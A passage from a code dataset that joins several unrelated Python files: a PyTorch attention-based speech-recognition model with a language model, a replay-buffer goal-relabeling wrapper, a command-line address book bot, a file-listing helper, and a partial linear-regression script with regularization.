prediction = []\n        logits, prediction, ws = [], [], []\n        # reset the attention module\n        self.attention.reset()\n\n        # init some beam search variables\n        # offset of each utterance's block of beams\n        pos_index = (torch.LongTensor(list(range(batch_size))) * topk).view(-1, 1)\n        enc_pad = _inflate(enc_pad, times=topk, dim=0)\n        enc_len = _inflate_np(np.array(enc_len), times=topk, dim=0)\n\n        sequence_scores = torch.Tensor(batch_size * topk, 1)\n        sequence_scores.fill_(-float('Inf'))\n        sequence_scores.index_fill_(0, torch.LongTensor([i * topk for i in range(0, batch_size)]), 0.0)\n\n        # Initialize the input vector\n        inp_var = torch.transpose(torch.LongTensor([[self.bos] * batch_size * topk]), 0, 1)\n\n        # Store decisions for backtracking\n        stored_outputs = list()\n        stored_scores = list()\n        stored_predecessors = list()\n        stored_emitted_symbols = list()\n        stored_hidden = list()\n\n        for step in range(max_dec_timesteps):\n            logit, dec_z, dec_c, c, w = \\\n                self.forward_step(inp_var, dec_z, dec_c, c, w, enc_pad, enc_len)\n\nclass E2E(torch.nn.Module):\n    def __init__(self, input_dim, enc_hidden_dim, enc_n_layers, subsample, 
dropout_rate, \n dec_hidden_dim, att_dim, conv_channels, conv_kernel_size, att_odim,\n embedding_dim, output_dim, ls_weight, labeldist, \n pad=0, bos=1, eos=2):\n\n super(E2E, self).__init__()\n\n # encoder to encode acoustic features\n self.encoder = Encoder(input_dim=input_dim, hidden_dim=enc_hidden_dim, \n n_layers=enc_n_layers, subsample=subsample, dropout_rate=dropout_rate)\n\n # attention module\n self.attention = AttLoc(encoder_dim=enc_hidden_dim, \n decoder_dim=dec_hidden_dim, att_dim=att_dim, \n conv_channels=conv_channels, conv_kernel_size=conv_kernel_size, \n att_odim=att_odim)\n\n # decoder to generate words (or other units) \n self.decoder = Decoder(output_dim=output_dim, \n hidden_dim=dec_hidden_dim, \n embedding_dim=embedding_dim,\n attention=self.attention, \n dropout_rate=dropout_rate, \n att_odim=att_odim, \n ls_weight=ls_weight, \n labeldist=labeldist, \n bos=bos, \n eos=eos, \n pad=pad)\n\n def forward(self, data, ilens, ys=None, tf_rate=1.0, max_dec_timesteps=200, \n sample=False, smooth=False, scaling=1.0, label_smoothing=True):\n enc_h, enc_lens = self.encoder(data, ilens)\n logits, log_probs, prediction, ws = self.decoder(enc_h, enc_lens, ys, \n tf_rate=tf_rate, max_dec_timesteps=max_dec_timesteps, \n sample=sample, smooth=smooth, scaling=scaling, label_smoothing=label_smoothing)\n return logits, log_probs, prediction, ws\n\n def mask_and_cal_loss(self, log_probs, ys, mask=None):\n # add 1 to EOS\n if mask is None: \n seq_len = [y.size(0) + 1 for y in ys]\n mask = cc(_seq_mask(seq_len=seq_len, max_len=log_probs.size(1)))\n else:\n seq_len = [y.size(0) for y in ys]\n # divide by total length\n loss = -torch.sum(log_probs * mask) / sum(seq_len)\n return loss\n\n# like standard LM\nclass LM(torch.nn.Module):\n def __init__(self, output_dim, embedding_dim, hidden_dim, dropout_rate, n_layers,\n bos, eos, pad, ls_weight, labeldist):\n super(LM, self).__init__()\n\n self.bos, self.eos, self.pad = bos, eos, pad\n self.embedding = torch.nn.Embedding(output_dim, embedding_dim, padding_idx=pad)\n self.LSTM = torch.nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers, batch_first=True, \n dropout=dropout_rate if n_layers > 1 else 0)\n\n # re-init\n weight_init(self.LSTM)\n\n self.output_layer = torch.nn.Linear(hidden_dim, output_dim)\n self.dropout_layer = torch.nn.Dropout(p=dropout_rate)\n\n self.hidden_dim = hidden_dim\n self.output_dim = output_dim\n self.dropout_rate = dropout_rate\n self.n_layers = n_layers\n\n # label smoothing hyperparameters\n self.ls_weight = ls_weight\n self.labeldist = labeldist\n if labeldist is not None:\n self.vlabeldist = cc(torch.from_numpy(np.array(labeldist, dtype=np.float32)))\n\n def zero_state(self, ref, dim=None):\n if not dim:\n return ref.new_zeros(self.n_layers, ref.size(0), self.hidden_dim)\n else:\n return ref.new_zeros(self.n_layers, ref.size(0), dim)\n\n def forward(self, ys=None, discrete_input=True):\n bos = ys[0].data.new([self.bos])\n eos = ys[0].data.new([self.eos])\n if discrete_input:\n ys_in = [torch.cat([bos, y, eos, eos, eos, eos], dim=0) for y in ys]\n ys_out = [torch.cat([y, eos, eos, eos, eos, eos], dim=0) for y in ys]\n pad_ys_in = pad_sequence(ys_in, batch_first=True, padding_value=self.eos) \n pad_ys_out = pad_sequence(ys_out, batch_first=True, padding_value=self.eos)\n # for generate output\n else:\n # add at the beginning, and drop last as input\n bos_seq = ys.new_zeros(ys.size(0), 1) + bos\n pad_ys_in = torch.cat([bos_seq, ys[:, :-1]], dim=1)\n pad_ys_out = ys\n\n # get length info\n batch_size, olength = 
pad_ys_in.size(0), pad_ys_in.size(1)\n # map idx to embedding\n eys = self.embedding(pad_ys_in)\n eys = self.dropout_layer(eys)\n # using pack to speedup\n if discrete_input:\n ilens = [y.size(0) for y in ys_in]\n packed_eys = pack_padded_sequence(eys, ilens, batch_first=True)\n output, (_, _) = self.LSTM(packed_eys)\n output, _ = pad_packed_sequence(output, batch_first=True)\n else:\n output, (_, _) = self.LSTM(eys)\n\n output = self.dropout_layer(output).squeeze(1)\n logits = self.output_layer(output)\n log_probs = F.log_softmax(logits, dim=2)\n probs = F.softmax(logits, dim=2)\n ys_log_probs = torch.gather(log_probs, dim=2, index=pad_ys_out.unsqueeze(2)).squeeze(2)\n ys_probs = torch.gather(probs, dim=2, index=pad_ys_out.unsqueeze(2)).squeeze(2)\n # label smoothing\n if self.ls_weight > 0 and self.training:\n loss_reg = torch.sum(log_probs * self.vlabeldist, dim=2)\n ys_log_probs = (1 - self.ls_weight) * ys_log_probs + self.ls_weight * loss_reg\n predictions = torch.argmax(logits, dim=-1)\n return ys_log_probs, ys_probs, predictions\n\n # only use in decode stage\n def forward_step(self, emb, dec_z=None, dec_c=None):\n if dec_z is not None:\n output, (dec_z, dec_c) = self.LSTM(emb, (dec_z, dec_c))\n else:\n output, (dec_z, dec_c) = self.LSTM(emb)\n output.squeeze_(1)\n logit = self.output_layer(output)\n return logit, dec_z, dec_c\n\n def decode(self, n_samples=5, sample=False, max_dec_timesteps=500):\n logits, predictions = [], []\n dec_c, dec_z = None, None\n for t in range(max_dec_timesteps):\n if t == 0:\n bos = cc(torch.Tensor([self.bos for _ in range(n_samples)]).type(torch.LongTensor))\n emb = self.embedding(bos).unsqueeze(1)\n else:\n emb = self.embedding(predictions[-1]).unsqueeze(1)\n logit, dec_z, dec_c = self.forward_step(emb, dec_z, dec_c)\n logits.append(logit)\n if not sample:\n predictions.append(torch.argmax(logit, dim=-1))\n else:\n sampled_indices = Categorical(logits=logit).sample() \n predictions.append(sampled_indices)\n\n logits = torch.stack(logits, dim=1)\n predictions = torch.stack(predictions, dim=1)\n return predictions\n\n def mask_and_cal_sum(self, log_probs, ys, mask=None):\n if mask is None: \n seq_len = [y.size(0) + 1 + 4 for y in ys]\n mask = cc(_seq_mask(seq_len=seq_len, max_len=log_probs.size(1)))\n else:\n seq_len = [y.size(0) for y in ys]\n # divide by total length\n loss = torch.sum(log_probs * mask) / sum(seq_len)\n return loss\n\n'''\nclass AELScorer(torch.nn.Module):\n def __init__(self, decoder, attention, \n output_dim, embedding_dim, hidden_dim, att_odim, dropout_rate, \n eos, pad):\n super(AELScorer, self).__init__()\n self.eos, self.pad = eos, pad\n\n self.embedding = torch.nn.Embedding(output_dim, embedding_dim, padding_idx=pad)\n self.LSTMCell = torch.nn.LSTMCell(embedding_dim + att_odim, hidden_dim)\n # load decoder weight\n self.embedding.load_state_dict(decoder.embedding.state_dict())\n self.embedding.requires_grad = False\n self.LSTMCell.load_state_dict(decoder.LSTMCell.state_dict())\n\n self.output_layer = torch.nn.Linear(hidden_dim, 1)\n self.attention = attention\n self.attention.requires_grad = False\n\n self.hidden_dim = hidden_dim\n self.att_odim = att_odim\n self.dropout_rate = dropout_rate\n\n def zero_state(self, enc_pad, dim=None):\n if not dim:\n return enc_pad.new_zeros(enc_pad.size(0), self.hidden_dim)\n else:\n return enc_pad.new_zeros(enc_pad.size(0), dim)\n\n def forward_step(self, emb, dec_z, dec_c, c, w, enc_pad, enc_len):\n cell_inp = torch.cat([emb, c], dim=-1)\n cell_inp = F.dropout(cell_inp, self.dropout_rate, 
training=self.training)\n dec_z, dec_c = self.LSTMCell(cell_inp, (dec_z, dec_c))\n\n # run attention module\n c, w = self.attention(enc_pad, enc_len, dec_z, w)\n # no concatenate on cell_output and context vector\n #output = torch.cat([dec_z, c], dim=-1)\n output = F.dropout(dec_z, self.dropout_rate)\n logit = self.output_layer(output)\n return logit, dec_z, dec_c, c, w\n\n def forward(self, enc_pad, enc_len, ys, is_distr=False):\n batch_size = enc_pad.size(0)\n\n if not is_distr:\n # prepare sequences\n pad_ys_in = pad_list(ys, pad_value=self.eos)\n\n # get length info\n batch_size, olength = pad_ys_in.size(0), pad_ys_in.size(1)\n # map idx to embedding\n eys = self.embedding(pad_ys_in)\n else:\n # if is_distr (batch_size, length, vocab_size), multiply the distr to embedding weight\n eys = ys @ self.embedding.weight\n olength = ys.size(1)\n\n # initialization\n dec_c = self.zero_state(enc_pad)\n dec_z = self.zero_state(enc_pad)\n c = self.zero_state(enc_pad, dim=self.att_odim)\n\n w = None\n logits, prediction, ws = [], [], []\n # reset the attention module\n self.attention.reset()\n\n # loop for each timestep\n for t in range(olength):\n logit, dec_z, dec_c, c, w = \\\n self.forward_step(eys[:, t, :], dec_z, dec_c, c, w, enc_pad, enc_len)\n ws.append(w)\n\n probs = torch.sigmoid(logit.squeeze(-1))\n cell_outputs = dec_z\n return probs, cell_outputs, ws\n\nclass Scorer(torch.nn.Module):\n def __init__(self, decoder, attention, \n output_dim, embedding_dim, hidden_dim, att_odim, dropout_rate, \n eos, pad):\n super(Scorer, self).__init__()\n\n self.eos, self.pad = eos, pad\n self.embedding = torch.nn.Embedding(output_dim, embedding_dim, padding_idx=pad)\n self.LSTMCell = torch.nn.LSTMCell(embedding_dim + att_odim, hidden_dim)\n # load decoder weight\n self.embedding.load_state_dict(decoder.embedding.state_dict())\n self.LSTMCell.load_state_dict(decoder.LSTMCell.state_dict())\n\n self.output_layer = torch.nn.Linear(hidden_dim + att_odim, 1)\n self.attention = attention\n\n self.hidden_dim = hidden_dim\n self.att_odim = att_odim\n self.dropout_rate = dropout_rate\n\n def zero_state(self, enc_pad, dim=None):\n if not dim:\n return enc_pad.new_zeros(enc_pad.size(0), self.hidden_dim)\n else:\n return enc_pad.new_zeros(enc_pad.size(0), dim)\n\n def forward_step(self, emb, dec_z, dec_c, c, w, enc_pad, enc_len):\n cell_inp = torch.cat([emb, c], dim=-1)\n cell_inp = F.dropout(cell_inp, self.dropout_rate, training=self.training)\n dec_z, dec_c = self.LSTMCell(cell_inp, (dec_z, dec_c))\n\n # run attention module\n c, w = self.attention(enc_pad, enc_len, dec_z, w)\n output = torch.cat([dec_z, c], dim=-1)\n output = F.dropout(output, self.dropout_rate, training=self.training)\n logit = self.output_layer(output)\n return logit, dec_z, dec_c, c, w\n\n def forward(self, enc_pad, enc_len, ys):\n batch_size = enc_pad.size(0)\n\n # prepare sequences\n #eos = ys[0].data.new([self.eos])\n #ys_in = [torch.cat([y, eos], dim=0) for y in ys]\n pad_ys_in = pad_list(ys, pad_value=self.eos)\n\n # get length info\n batch_size, olength = pad_ys_in.size(0), pad_ys_in.size(1)\n # map idx to embedding\n eys = self.embedding(pad_ys_in)\n\n # initialization\n dec_c = self.zero_state(enc_pad)\n dec_z = self.zero_state(enc_pad)\n c = self.zero_state(enc_pad, dim=self.att_odim)\n\n w = None\n logits, prediction, ws = [], [], []\n # reset the attention module\n self.attention.reset()\n\n # loop for each timestep\n for t in range(olength):\n logit, dec_z, dec_c, c, w = \\\n self.forward_step(eys[:, t, :], dec_z, dec_c, c, w, 
enc_pad, enc_len)\n\n ws.append(w)\n logits.append(logit)\n\n logits = torch.stack(logits, dim=1).squeeze(dim=2)\n probs = torch.sigmoid(logits)\n ws = torch.stack(ws, dim=1)\n\n return probs, ws\n\nclass Judge(torch.nn.Module):\n def __init__(self, encoder, attention, decoder, \n input_dim, enc_hidden_dim, enc_n_layers, subsample, dropout_rate, \n dec_hidden_dim, att_dim, conv_channels, conv_kernel_size, att_odim, \n embedding_dim, output_dim, \n pad=0, eos=2, shared=True):\n\n super(Judge, self).__init__()\n self.shared = shared\n # share the parameters of encoder\n if shared:\n self.encoder = encoder\n else:\n self.encoder = Encoder(input_dim=input_dim, hidden_dim=enc_hidden_dim,\n n_layers=enc_n_layers, subsample=subsample, dropout_rate=dropout_rate)\n self.encoder.load_state_dict(encoder.state_dict())\n\n self.attention = AttLoc(encoder_dim=enc_hidden_dim, \n decoder_dim=dec_hidden_dim, att_dim=att_dim, \n conv_channels=conv_channels, conv_kernel_size=conv_kernel_size, \n att_odim=att_odim)\n self.attention.load_state_dict(attention.state_dict())\n\n self.scorer = AELScorer(decoder, self.attention, \n output_dim=output_dim, embedding_dim=embedding_dim, \n hidden_dim=dec_hidden_dim, att_odim=att_odim, dropout_rate=dropout_rate, \n eos=eos, pad=pad)\n\n def forward(self, data, ilens, ys, is_distr=False):\n if self.shared:\n with torch.no_grad():\n enc_h, enc_lens = self.encoder(data, ilens)\n else:\n enc_h, enc_lens = self.encoder(data, ilens)\n probs, cell_out, ws = self.scorer(enc_h, enc_lens, ys, is_distr=is_distr)\n return probs, cell_out, ws\n\n #def mask_and_average(self, probs, ys):\n # seq_len = [y.size(0) for y in ys]\n # mask = cc(_seq_mask(seq_len=seq_len, max_len=probs.size(1)))\n # masked_probs = probs * mask\n # # divide by total length\n # avg_probs = torch.sum(masked_probs, dim=1) / (torch.sum(mask, dim=1) + 1e-10)\n # return avg_probs, masked_probs, mask\n\n #def mask_and_cal_loss(self, avg_probs, target):\n # avg_probs = self.mask(probs, ys)\n # loss = F.binary_cross_entropy(avg_probs, target)\n # return loss, avg_probs\n'''\n\nif __name__ == '__main__':\n # just for debugging\n def get_data(root_dir='/storage/feature/LibriSpeech/npy_files/train-clean-100/7402/90848', text_index_path='/storage/feature/LibriSpeech/text_bpe/train-clean-100/7402/7402-90848.label.txt'):\n prefix = '7402-90848'\n datas = []\n for i in range(8):\n seg_id = str(i).zfill(4)\n filename = f'{prefix}-{seg_id}.npy'\n path = os.path.join(root_dir, filename)\n data = torch.from_numpy(np.load(path)).type(torch.FloatTensor)\n datas.append(data)\n datas.sort(key=lambda x: x.size(0), reverse=True)\n ilens = np.array([data.size(0) for data in datas], dtype=np.int64)\n datas = pad_sequence(datas, batch_first=True, padding_value=0)\n\n ys = []\n with open(text_index_path, 'r') as f:\n for line in f:\n utt_id, indexes = line.strip().split(',', maxsplit=1)\n indexes = cc(torch.Tensor([int(index) + 3 for index in indexes.split()]).type(torch.LongTensor))\n ys.append(indexes)\n return datas, ilens, ys[:8]\n data, ilens, ys = get_data()\n data = cc(data)\n # NOTE: embedding_dim, ls_weight and labeldist are required arguments that were\n # missing here; placeholder values are filled in so this smoke test can run\n model = cc(E2E(input_dim=40, enc_hidden_dim=800, enc_n_layers=3, \n subsample=[1, 2, 1], dropout_rate=0.3, \n dec_hidden_dim=1024, att_dim=512, conv_channels=10, \n conv_kernel_size=201, att_odim=800, embedding_dim=500, \n output_dim=500, ls_weight=0, labeldist=None))\n # forward() returns a 4-tuple: logits, log_probs, prediction, ws\n logits, log_probs, prediction, ws = model(data, ilens, ys)\n p_lens = [p.size() for p in prediction]\n t_lens = [t.size() for t in 
ys]\n\n","repo_name":"jjery2243542/semi-supervised-ASR","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":34061,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"}
{"seq_id":"40271635710","text":"from dsb.dependencies import *\nfrom dsb.buffers.utils import get_timestep_of, sample_pos_pair_indices\nfrom dsb.utils import torchify\n\nfrom ..sample_buffer_wrapper import SampleBufferWrapper\n\n\nclass OnlineRPLBufferWrapper(SampleBufferWrapper):\n def __init__(\n self,\n buffer,\n # see appendix A of https://arxiv.org/abs/1910.11956\n window_low=30,\n window_high=260,\n high_action_same_as_low_goal=False,\n substitute_tensor=False, # set True w/ demonstrations replay buffer\n **kwargs,\n ):\n super().__init__(buffer, **kwargs)\n self.window_low = window_low\n self.window_high = window_high\n self.high_action_same_as_low_goal = high_action_same_as_low_goal\n self.substitute_tensor = substitute_tensor\n\n def get_batch(self, batch_it, ptrs):\n ptrs, batch = self.buffer.get_batch(batch_it, ptrs)\n state, action, next_state, reward, done = batch\n\n # see Algorithm 2 and 3 of https://arxiv.org/abs/1910.11956\n # we implement relay data relabeling in an online fashion,\n # setting the low goal as state['low_desired_goal'],\n # the high goal as state['desired_goal'],\n # and the high action as state['high_action']\n\n low_goal_all_selected_episode_ptrs = []\n high_goal_all_selected_episode_ptrs = []\n high_action_all_selected_episode_ptrs = []\n\n start_ptrs = self.start_ptr[ptrs]\n for s in np.unique(start_ptrs):\n # NOTE: using [:] to get numpy array from ShmemNumpyArray\n episode_ptrs = np.array(self.episode_ptrs[s][:])\n N = len(episode_ptrs)\n if N == 1:\n continue # if t=[0] and N=1, then no future transitions\n\n # gets timestep of ptr in episode transitions\n y = ptrs[start_ptrs == s]\n t = get_timestep_of(y, episode_ptrs)\n\n # if finding pair for last transition, then it will be paired with itself\n low_goal_selected_t = sample_pos_pair_indices(t, N, 1, self.window_low)\n low_goal_selected_episode_ptr = episode_ptrs[low_goal_selected_t]\n low_goal_all_selected_episode_ptrs.append(low_goal_selected_episode_ptr)\n\n # if finding pair for last transition, then it will be paired with itself\n high_goal_selected_t = sample_pos_pair_indices(t, N, 1, self.window_high)\n high_goal_selected_episode_ptr = episode_ptrs[high_goal_selected_t]\n high_goal_all_selected_episode_ptrs.append(high_goal_selected_episode_ptr)\n\n if self.high_action_same_as_low_goal:\n pass # dealt with later\n else:\n # if finding pair for last transition, then it will be paired with itself\n high_action_selected_t = sample_pos_pair_indices(t, N, 1, self.window_low)\n high_action_selected_episode_ptr = episode_ptrs[high_action_selected_t]\n high_action_all_selected_episode_ptrs.append(high_action_selected_episode_ptr)\n\n low_goal_selected_episode_ptr = np.concatenate(low_goal_all_selected_episode_ptrs)\n high_goal_selected_episode_ptr = np.concatenate(high_goal_all_selected_episode_ptrs)\n if self.high_action_same_as_low_goal:\n high_action_selected_episode_ptr = None\n else:\n high_action_selected_episode_ptr = np.concatenate(high_action_all_selected_episode_ptrs)\n\n batch = self.substitute_goal(\n batch,\n low_goal_selected_episode_ptr,\n high_goal_selected_episode_ptr,\n high_action_selected_episode_ptr,\n )\n return ptrs, batch\n\n def substitute_goal(\n self, batch, low_goal_relabel_ptrs, high_goal_relabel_ptrs, high_action_relabel_ptrs\n ):\n state, action, next_state, reward, done = batch\n\n # TODO: should we be getting next_state instead as goal?\n _low_goal = self.buffer.get_state(low_goal_relabel_ptrs, 'achieved_goal').copy()\n if self.substitute_tensor:\n low_goal = torchify(_low_goal, dtype=None, device='cpu')\n else:\n low_goal = _low_goal\n state['low_desired_goal'] = low_goal\n next_state['low_desired_goal'] = low_goal\n\n high_goal = self.buffer.get_state(high_goal_relabel_ptrs, 'achieved_goal').copy()\n if self.substitute_tensor:\n high_goal = torchify(high_goal, dtype=None, device='cpu')\n state['desired_goal'] = high_goal\n next_state['desired_goal'] = high_goal\n\n if self.high_action_same_as_low_goal:\n if self.substitute_tensor:\n high_action = torchify(_low_goal.copy(), dtype=None, device='cpu')\n else:\n high_action = low_goal.copy()\n else:\n high_action = self.buffer.get_state(high_action_relabel_ptrs, 'achieved_goal').copy()\n if self.substitute_tensor:\n high_action = torchify(high_action, dtype=None, device='cpu')\n state['high_action'] = high_action\n\n batch = (state, action, next_state, reward, done)\n return batch\n","repo_name":"etaoxing/domain-shift-benchmark","sub_path":"dsb/buffers/buffer_wrapper/episodic/online_rpl_buffer_wrapper.py","file_name":"online_rpl_buffer_wrapper.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
{"seq_id":"22106609048","text":"from collections import UserDict\nfrom datetime import datetime, date, timedelta\n\n\ndef input_error(handler_func):\n def wrapper(*args, **kwargs):\n try:\n return handler_func(*args, **kwargs)\n except KeyError:\n print('Enter user name')\n except ValueError:\n print('Give me name and phone please')\n except IndexError:\n print('Invalid input, please try again')\n return wrapper\n\n\nclass AddressBook(UserDict):\n def __init__(self):\n super().__init__()\n self.current_page = 1\n self.page_size = 5\n\n def add_record(self, record):\n self.data[record.name.value] = record\n\n def iterator(self):\n total_records = len(self.data)\n total_pages = (total_records - 1) // self.page_size + 1\n start_index = (self.current_page - 1) * self.page_size\n end_index = self.current_page * self.page_size\n records = list(self.data.values())[start_index:end_index]\n for record in records:\n yield record\n\n print(f\"Page {self.current_page} of {total_pages}\")\n print(f\"Total records: {total_records}\")\n print()\n\n def next_page(self):\n total_pages = (len(self.data) - 1) // self.page_size + 1\n if self.current_page < total_pages:\n self.current_page += 1\n self.show_current_page()\n else:\n print(\"No more pages available\")\n\n def previous_page(self):\n if self.current_page > 1:\n self.current_page -= 1\n self.show_current_page()\n else:\n print(\"Already at the first page\")\n\n def show_current_page(self):\n print(f\"--- Page {self.current_page} ---\")\n for record in self.iterator():\n print(record)\n print()\n\n print(f\"--- Page {self.current_page} ---\")\n print()\n\n def show_all(self):\n print(\"All records:\")\n for record in self.data.values():\n print(record)\n print()\n\n\nclass Record:\n def __init__(self, name, phone, birthday=None):\n self.name = Name(name)\n self.phones = []\n self.add_phone(phone)\n self.birthday = None\n if birthday:\n self.birthday = Birthday(birthday)\n\n def add_birthday(self, birthday):\n if self.birthday:\n print('Contact already has a birthday')\n else:\n self.birthday = Birthday(birthday)\n 
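# Birthday.validate has already accepted the 'DD-MM-YYYY' string by this point\n 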
print('Birthday added for contact', self.name.value)\n\n @input_error\n def add_phone(self, phone):\n self.phones.append(Phone(phone))\n\n def remove_phone(self, phone):\n self.phones = [p for p in self.phones if p.value != phone]\n\n @input_error\n def change_phone(self, new_phone):\n for phone in self.phones:\n phone.value = new_phone\n\n def days_to_birthday(self, birthday):\n today = date.today()\n # use the same 'DD-MM-YYYY' format that Birthday.validate enforces\n birthday = datetime.strptime(birthday, \"%d-%m-%Y\").date()\n\n next_birthday = date(today.year, birthday.month, birthday.day)\n\n if next_birthday < today:\n next_birthday = date(today.year + 1, birthday.month, birthday.day)\n\n days_left = (next_birthday - today).days\n return days_left\n\n def show_phones(self):\n return [phone.value for phone in self.phones]\n\n\nclass Field:\n def __init__(self, value):\n self.value = value\n\n\nclass Name(Field):\n pass\n\n\nclass Phone(Field):\n def __init__(self, value):\n super().__init__(None)\n self.value = self.validate(value)\n\n @staticmethod\n def validate(value):\n if not value.startswith(\"+\"):\n raise ValueError(\n \"Invalid phone number format. Phone number must start with '+'\")\n return value\n\n\nclass Birthday(Field):\n def __init__(self, value):\n super().__init__(None)\n self.value = self.validate(value)\n\n @staticmethod\n def validate(value):\n try:\n date_format = \"%d-%m-%Y\"\n parsed_date = datetime.strptime(value, date_format)\n return parsed_date.date()\n except ValueError:\n raise ValueError(\n \"Invalid birthday format. Birthday must be in the format 'DD-MM-YYYY'\")\n\n\ndef main():\n address_book = AddressBook()\n print(\"Bot started, please enter your command\")\n while True:\n command = input(\"Enter command:>>>\")\n if command == 'hello':\n print('How can I help you?')\n elif command.startswith('add'):\n _, name, phone, *birthday = command.split(' ')\n if name not in address_book.data:\n record = Record(name, phone, birthday[0] if birthday else None)\n address_book.add_record(record)\n print('Contact added: {} - {}'.format(name, phone))\n else:\n print('Contact already exists')\n elif command.startswith('change'):\n _, name, new_phone = command.split(' ')\n if name in address_book.data:\n record = address_book.data[name]\n record.change_phone(new_phone)\n print('Phone changed to {} for contact {}'.format(new_phone, name))\n else:\n print('Contact not found')\n elif command == 'show all':\n for name, record in address_book.data.items():\n print('Name: {}'.format(name))\n print('Phones: {}'.format(', '.join(record.show_phones())))\n print()\n elif command.startswith('phone'):\n _, name = command.split()\n if name in address_book.data:\n record = address_book.data[name]\n print('Phone number for {}: {}'.format(\n name, ', '.join(record.show_phones())))\n else:\n print(\"Contact not found\")\n elif command == 'next':\n address_book.next_page()\n elif command == 'prev':\n address_book.previous_page()\n elif command.startswith('birth_add'):\n _, name, birthday = command.split(' ')\n if name in address_book.data:\n # attach the birthday to the existing record instead of\n # creating a new Record (which would misuse birthday as phone)\n record = address_book.data[name]\n record.add_birthday(birthday)\n else:\n print('Contact not found')\n elif command == 'good bye' or command == 'close' or command == 'exit':\n print('Bye')\n break\n else:\n print('Unknown command. 
Please try again.')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"igorgroni/GOIT_HM","sub_path":"HM_11/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6591353479","text":"import os\nfrom re import match\n\n\ndef find_all_python_files(input_path: str) -> list[str]:\n python_files = []\n for dirpath, _dirnames, filenames in os.walk(input_path):\n for filename in filenames:\n if match(r\".*\\.py$\", filename):\n python_files.append(os.path.join(dirpath, filename))\n \n return python_files\n\n\ndef get_source_code_from_file(input_file: str) -> str:\n content = \"\"\n with open(input_file, \"r\") as md_file:\n content = md_file.read()\n return content\n\n\ndef get_import_name_from_path(input_path: str, input_file: str) -> str:\n return (\n input_file\n .replace(input_path, \"\")\n .replace(\".py\", \"\")\n .replace(\".\", \"\")\n .replace(os.sep, \".\")\n .replace(\".__init__\", \"\")\n .replace(\"__init__\", \".\")\n )\n","repo_name":"Michael-Reel/pyremaid","sub_path":"src/pyremaid/files/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74981677858","text":"'''\r\n----------------------------------------------------------------------------------\r\nlinear regression python code using pandas and numpy library with regularization\r\nwith only two feature that is x1 and x2\r\noutput is y\r\nhypothesis function(predicted/model function) is h\r\nparameters/coeffcients theta0,theta1,theta2\r\nregularizatiion parameter LAMBDA\r\n-------------------------prepared by Devaraj Nadiger------------------------------\r\n'''\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nLEARNING_RATE=0.000001\r\nITERATIONS=100\r\nLAMBDA=100\r\n\r\n#hypothesis function\r\ndef hyp(X,theta):\r\n hyp=theta.T.dot(X)\r\n return hyp\r\n#regularization term to add in cost function\r\ndef reg2(theta,m,g,l):\r\n theta=theta[1:]\r\n r=((np.sum((theta)**2))*l)/(2*m)\r\n return r\r\n#regularization term to add in gradient function\r\ndef reg(theta,m,g,l,a):\r\n theta=theta[1:]\r\n o=(np.sum(theta))*(l)/m\r\n return o\r\n\r\n#cost function\r\ndef cost_fun(X,Y,theta,m,g,l):\r\n j=np.sum((hyp(X,theta)-Y)**2)/(2*m)\r\n j=j+reg2(theta,m,g,l)\r\n return j\r\n\r\n#gradient descent algorithm\r\ndef grad_des(X,Y,theta,a,itrns,m,theta_len,L):\r\n count=[0]*itrns\r\n d=[0]*itrns\r\n for i in range(itrns):\r\n h=hyp(X,theta)\r\n grad=X.dot(h-Y)/m\r\n #storing theta1 value to draw graph\r\n d[i]=theta[1]\r\n cost=cost_fun(X,Y,theta,m,theta_len,L)\r\n theta=theta-a*grad\r\n \r\n #calling regularization function and substarcting it from theta1 and theta2\r\n z=reg(theta,m,theta_len,L,a)\r\n theta[1]=theta[1]-z\r\n theta[2]=theta[2]-z\r\n \r\n count[i]=cost\r\n return theta,count,d\r\n\r\n#main function\r\ndef main():\r\n data=pd.read_csv('channing.csv') #reading csv file\r\n x1=data[\"entry\"].values\r\n x1=(x1-np.mean(x1))/(max(x1)-min(x1))\r\n x1d=x1\r\n x2=data[\"exit\"].values\r\n x2d=x2\r\n x2=(x2-np.mean(x2))/(max(x2)-min(x2))\r\n y=data[\"time\"].values \r\n m=len(x1)\r\n x0=np.ones(m)\r\n X=np.array([x0,x1,x2])\r\n Y=np.array(y)\r\n theta=np.array([1,1,1])\r\n theta_len=len(theta)\r\n a=LEARNING_RATE\r\n itrns=ITERATIONS\r\n L=LAMBDA\r\n j=list(range(0,itrns,1))\r\n \r\n H=hyp(X,theta)\r\n 
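\r\n    # plot the untrained model first: H is the prediction from the initial all-ones theta (blue) versus the actual outputs (red)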
\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111, projection='3d')\r\n ax.scatter(x1d, x2d, y, c='r')\r\n ax.scatter(x1d, x2d, H, c='b')\r\n ax.set_xlabel('x1 feature')\r\n ax.set_ylabel('x2 feature')\r\n ax.set_zlabel('initial predicted(blue) vs actual(red) output')\r\n plt.show()\r\n\r\n new_theta,count,d=grad_des(X,Y,theta,a,itrns,m,theta_len,L)\r\n\r\n \r\n print('cost_function=',count)\r\n print('\\n')\r\n \r\n plt.scatter(d,count,color='red')\r\n plt.plot(d,count)\r\n plt.xlabel('parameter')\r\n plt.ylabel('cost_function')\r\n plt.title('cost function curve ')\r\n plt.show()\r\n\r\n plt.scatter(j,d,color='red')\r\n plt.plot(j,d)\r\n plt.xlabel('iteration')\r\n plt.ylabel('parameter')\r\n plt.title('parameter vs iteration ')\r\n plt.show()\r\n \r\n plt.scatter(j,count,color='red')\r\n plt.plot(j,count)\r\n plt.xlabel('iterations')\r\n plt.ylabel('cost_function')\r\n plt.title('cost function curve ')\r\n plt.show()\r\n \r\n print('final_theta=',new_theta)\r\n \r\n pr=hyp(X,new_theta) \r\n \r\n fig = plt.figure()\r\n ax = fig.add_subplot(111, projection='3d')\r\n ax.scatter(x1d, x2d, y, c='r')\r\n 